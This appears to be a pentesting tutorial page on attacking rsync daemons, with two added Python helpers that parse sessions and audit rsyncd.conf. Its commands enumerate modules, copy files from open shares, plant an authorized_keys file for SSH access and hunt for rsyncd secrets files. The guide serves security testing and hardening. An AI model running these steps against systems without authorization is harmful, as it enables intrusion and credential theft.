873 - Pentesting Rsync
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
From wikipedia:
rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.[3] It is commonly found on Unix-like operating systems. The rsync algorithm is a type of delta encoding, and is used for minimizing network usage. Zlib may be used for additional data compression,[3] and SSH or stunnel can be used for security.
Default port: 873
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Enumeration
Banner & Manual communication
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the server to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Server closes the connection
# Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
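The exchange above can be parsed mechanically when reviewing captured daemon sessions, for example to see which modules a server advertises and which ones answer with a challenge. The following is an added example, not code from the original page; `DaemonSession`, `parse_session` and the two sample transcripts are names chosen here, and the transcripts are constructed from the values shown above with the annotations removed.

```python
from dataclasses import dataclass, field
from typing import List, Optional
PREFIX = "@RSYNCD:"
# Constructed transcripts reusing the values shown in the session above.
LIST_SESSION = """(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
raidroot
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID
@RSYNCD: EXIT
"""
MODULE_SESSION = """@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g
"""

@dataclass
class DaemonSession:
    server_version: Optional[str] = None
    request: Optional[str] = None          # "#list" or the module name asked for
    modules: List[str] = field(default_factory=list)
    outcome: str = "incomplete"            # listed | auth_required | open | error
    detail: str = ""                       # challenge or error text

def parse_session(transcript: str) -> DaemonSession:
    """Parse an interleaved transcript: two greetings, one request, then replies."""
    s, greetings = DaemonSession(), 0
    for ln in (raw.strip() for raw in transcript.splitlines()):
        words = ln[len(PREFIX):].split() if ln.startswith(PREFIX) else None
        if words and s.request is None:            # greeting exchange
            s.server_version = s.server_version or words[0]
            greetings += 1
        elif words and words[0] == "EXIT" and s.request == "#list":
            s.outcome = "listed"
        elif words and words[0] == "AUTHREQD":
            s.outcome, s.detail = "auth_required", " ".join(words[1:])
        elif words and words[0] == "OK" and s.outcome == "incomplete":
            s.outcome = "open"                     # module served with no challenge
        elif ln.startswith("@ERROR"):
            s.outcome, s.detail = "error", ln
        elif ln and words is None and greetings >= 2 and s.request is None:
            s.request = ln                         # first client line after greetings
        elif ln and words is None and s.request == "#list":
            s.modules.append(ln.split("\t")[0].strip())  # "name<TAB>comment"
    return s
```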
Enumerating Shared Folders
Rsync modules are recognized as directory shares that might be protected with passwords. To identify available modules and check if they require passwords, the following commands are used:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Be aware that some shares might not appear in the list, possibly because they are hidden. Additionally, accessing some shares might be restricted to specific credentials, indicated by an "Access Denied" message.
Brute Force
Manual Rsync Usage
Upon obtaining a module list, actions depend on whether authentication is needed. Without authentication, listing and copying files from a shared folder to a local directory is achieved through:
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
With credentials, listing and downloading from a shared folder can be done as follows; a password prompt will appear:
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
To upload content, such as an authorized_keys file for access, use:
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
POST
To locate the rsyncd configuration file, execute:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Within this file, a secrets file parameter may point to a file containing the usernames and passwords used for rsyncd authentication.
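Once rsyncd.conf has been located, the settings behind the behaviours described on this page (modules that need no password, modules that accept uploads) can be reviewed per module. The following is an added example, not code from the original page or from the rsync project; `parse_rsyncd_conf`, `audit` and `SAMPLE_CONF` are names chosen here, and the sample configuration is constructed. It relies on the documented rsyncd.conf parameters `auth users`, `secrets file`, `read only` and `hosts allow`.

```python
import re

TRUE = {"yes", "true", "1"}  # boolean spellings accepted in rsyncd.conf
# Constructed sample configuration (not taken from a real host).
SAMPLE_CONF = """\
uid = nobody
[backups]
    path = /srv/backups
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 192.168.0.0/24
[home_user]
    path = /home/user
    Read Only = no
"""

def parse_rsyncd_conf(text):
    """Return (global_params, {module: params}); keys lowercased, whitespace removed."""
    glob, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), {})
        elif "=" in line:
            name, value = line.split("=", 1)  # only the first '=' separates name and value
            key = "".join(name.lower().split())  # whitespace in names is irrelevant
            (glob if current is None else current)[key] = value.strip()
    return glob, modules

def audit(text):
    """Map each module to its findings; global values act as per-module defaults."""
    glob, modules = parse_rsyncd_conf(text)
    report = {}
    for name, params in modules.items():
        eff = {**glob, **params}
        anonymous = not eff.get("authusers", "")
        writable = eff.get("readonly", "yes").lower() not in TRUE  # default is read only
        findings = []
        if anonymous:
            findings.append("no 'auth users': module is open without a password")
        if writable:
            findings.append("'read only' is off: clients can upload")
        if not eff.get("hostsallow"):
            findings.append("no 'hosts allow': reachable from any address")
        report[name] = findings
    return report
```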